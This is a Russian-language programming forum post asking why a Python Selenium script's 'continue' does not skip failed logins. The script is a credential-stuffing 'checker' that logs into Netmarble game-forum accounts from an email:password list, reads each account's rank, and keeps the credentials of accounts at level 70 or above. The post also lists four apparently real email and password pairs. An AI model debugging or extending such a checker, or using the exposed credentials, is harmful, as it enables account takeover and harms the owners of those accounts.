# Как перезапускать код на селениуме

Tags: python, selenium

Я пишу чекер и заодно маленький парсер так вот когда выходит ошибка на определенном аккакаунте то данные не валид и мне нужно его пропустить и идти дальше чекать но мой скрипт просто этого не делает и я, в общем, не пойму что нужно сделать чтобы оно заработало. То есть моя задача: когда я нахожу невалид данные почту и емеил мне нужно их пропускать и идти дальше по списку, а у меня конструкция continue не работает, как она должна работать в моей голове вот ниже мой код:

```
from selenium.webdriver.common.by import By
import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from bs4 import BeautifulSoup
# from selenium.common.exceptions import NoSuchElementException


def check_account(driver, go):
    driver.get(url="https://forum.netmarble.com/7ds_en/")
    wait = WebDriverWait(driver, 10)

    valide_accounts = []

    for i in go:

        print(i)

        login_button = wait.until(ec.element_to_be_clickable((By.XPATH, "//a[@id='gnbBtnLogin']")))
        login_button.click()
        time.sleep(2)

        driver.execute_script("document.body.style.zoom='70%'")

        login_on_mail = wait.until(ec.visibility_of_element_located((By.XPATH, "//a[em[@class='ic_sns ic_email']]")))
        driver.execute_script("arguments[0].click();", login_on_mail)
        time.sleep(2)

        email_input = driver.find_element(By.XPATH, "//input[@name='mailAddress']")
        email_input.clear()
        email_input.send_keys(i[0])
        time.sleep(1)

        password_input = driver.find_element(By.XPATH, "//input[@name='password']")
        password_input.clear()
        password_input.send_keys(i[1])
        time.sleep(1)

        login_button = driver.find_element(By.XPATH, "//a[@id='btnLogin']")
        login_button.click()
        time.sleep(3)

        if driver.find_elements(By.XPATH, "//a[@class='btn_profile']") is not None:
            img_button = driver.find_element(By.XPATH, "//a[@class='btn_profile']")
            img_button.click()
            time.sleep(1)

        profile_button = driver.find_element(By.XPATH, "//a[em[@class='ic ic_profile']]")
        profile_button.click()
        time.sleep(3)

        html_code = driver.page_source

        soup = BeautifulSoup(html_code, 'lxml')

        rank = soup.find('dd', class_='t3')
        rank_text = rank.text
        lvl_rank = rank_text.split('|')[-1].strip()

        img_button = driver.find_element(By.XPATH, "//a[@class='btn_profile']")
        img_button.click()
        time.sleep(1)

        exit = driver.find_element(By.XPATH, '//*[@id="gnbLogout"]')
        exit.click()

        if int(lvl_rank) >= 70:
            valide_accounts.append([f"Уровень аккаунта: {lvl_rank} --- Емеил: {i[0]} --- Пароль:{i[1]}"])

    return valide_accounts


def check_account_valide(web_url, driver, go):
    driver.get(url=web_url)
    wait = WebDriverWait(driver, 10)

    valide_accounts = []

    for i in go:

        print(i)

        login_button = wait.until(ec.element_to_be_clickable((By.XPATH, "//a[@id='gnbBtnLogin']")))
        login_button.click()
        time.sleep(2)

        driver.execute_script("document.body.style.zoom='70%'")

        login_on_mail = wait.until(ec.visibility_of_element_located((By.XPATH, "//a[em[@class='ic_sns ic_email']]")))
        driver.execute_script("arguments[0].click();", login_on_mail)
        time.sleep(2)

        email_input = driver.find_element(By.XPATH, "//input[@name='mailAddress']")
        email_input.clear()
        email_input.send_keys(i[0])
        time.sleep(1)

        password_input = driver.find_element(By.XPATH, "//input[@name='password']")
        password_input.clear()
        password_input.send_keys(i[1])
        time.sleep(1)

        login_button = driver.find_element(By.XPATH, "//a[@id='btnLogin']")
        login_button.click()
        time.sleep(3)

        # error_message = driver.find_elements(By.XPATH, "//*[@id='popAlertMessage']/div")
        # error_message2 = driver.find_elements(By.XPATH, '//div[@class="cmn_alert"]/p')

        # if error_message is None or error_message2 is None:
        #     if error_message is not None:
        #         if len(error_message) > 0 and error_message[
        #             0].text == 'Данный адрес электронной почты не зарегистрирован. Проверьте и повторите попытку.':
        #             # print('Данные не валид, едем дальше!')
        #             driver.get(url=web_url)
        #             continue
        #     elif error_message2 is not None:
        #         if error_message2.text == 'Можно использовать, создав персонажа в игре.':
        #             # print('Данные не валид, едем дальше!')
        #             driver.get(url=web_url)
        #             continue
        #     elif error_message is None or error_message2 is None:
        #         driver.get(url=web_url)
        #         continue

        error_message = driver.find_elements(By.XPATH, "//*[@id='popAlertMessage']/div")
        if len(error_message) > 0 and error_message[
            0].text == 'Данный адрес электронной почты не зарегистрирован. Проверьте и повторите попытку.':
            print('Данные не валид, едем дальше!')

            continue


        error_message2 = driver.find_element(By.XPATH, '//*[@id="appView"]/div/p')

        if error_message2.text == 'Можно использовать, создав персонажа в игре.':
            print('Данные не валид, едем дальше!')

            continue


        img_button = driver.find_element(By.XPATH, "//a[@class='btn_profile']")
        img_button.click()
        time.sleep(1)

        profile_button = driver.find_element(By.XPATH, "//a[em[@class='ic ic_profile']]")
        profile_button.click()
        time.sleep(3)

        html_code = driver.page_source

        soup = BeautifulSoup(html_code, 'lxml')

        rank = soup.find('dd', class_='t3')
        rank_text = rank.text
        lvl_rank = rank_text.split('|')[-1].strip()

        img_button = driver.find_element(By.XPATH, "//a[@class='btn_profile']")
        img_button.click()
        time.sleep(1)

        exit = driver.find_element(By.XPATH, '//*[@id="gnbLogout"]')
        exit.click()

        if int(lvl_rank) >= 70:
            valide_accounts.append([f"Уровень аккаунта: {lvl_rank} --- Емеил: {i[0]} --- Пароль:{i[1]}"])

    return valide_accounts


def main():
    url = 'https://forum.netmarble.com/7ds_en/'
    option = webdriver.ChromeOptions()
    option.add_argument("--start-maximized")
    driver = webdriver.Chrome(options=option)

    try:
        with open('ЧекГРЕХИ13.03.2023.txt', 'r', encoding='utf-8') as file:
            strings = file.read().splitlines()

        go = []
        for i in strings:
            email = i.split(":")[0]
            password = i.split(":")[1]
            go.append([email, password])

        check_account_valide(url, driver, go)

        """
        print('Сейчас чекаеться 1 аккаунт....\n')

        item = 0
        while item < 5:
            email, password = strings[item].split(':')
            rank = check_account_valide(url, driver, email, password)

            if rank is not None:
                print(f"Ранк игрока: {rank}\nПочта: {email}\nПароль: {password}\n")

            item += 1

            if item != 5:
                print(f"Сейчас чекаеться {item+1} аккаунт....\n")
                driver.quit()
                driver = webdriver.Chrome(options=option)
        """

    except Exception as ex:
        print(ex)


if __name__ == '__main__':
    main()
```

Данные для чека:

```
comescaca26@gmail.com:BLUElight1 на этом выходит ошибка
rotceh7801@hotmail.com:nagh010414
jklwolf@gmail.com:240postres
lloyd72505@gmail.com:72505lbff
```

проблема возникает мне кажется в этом месте:

```
error_message2 = driver.find_element(By.XPATH, '//*[@id="appView"]/div/p')

if error_message2.text == 'Можно использовать, создав персонажа в игре.':
    print('Данные не валид, едем дальше!')

    continue


img_button = driver.find_element(By.XPATH, "//a[@class='btn_profile']")
img_button.click()
time.sleep(1)
```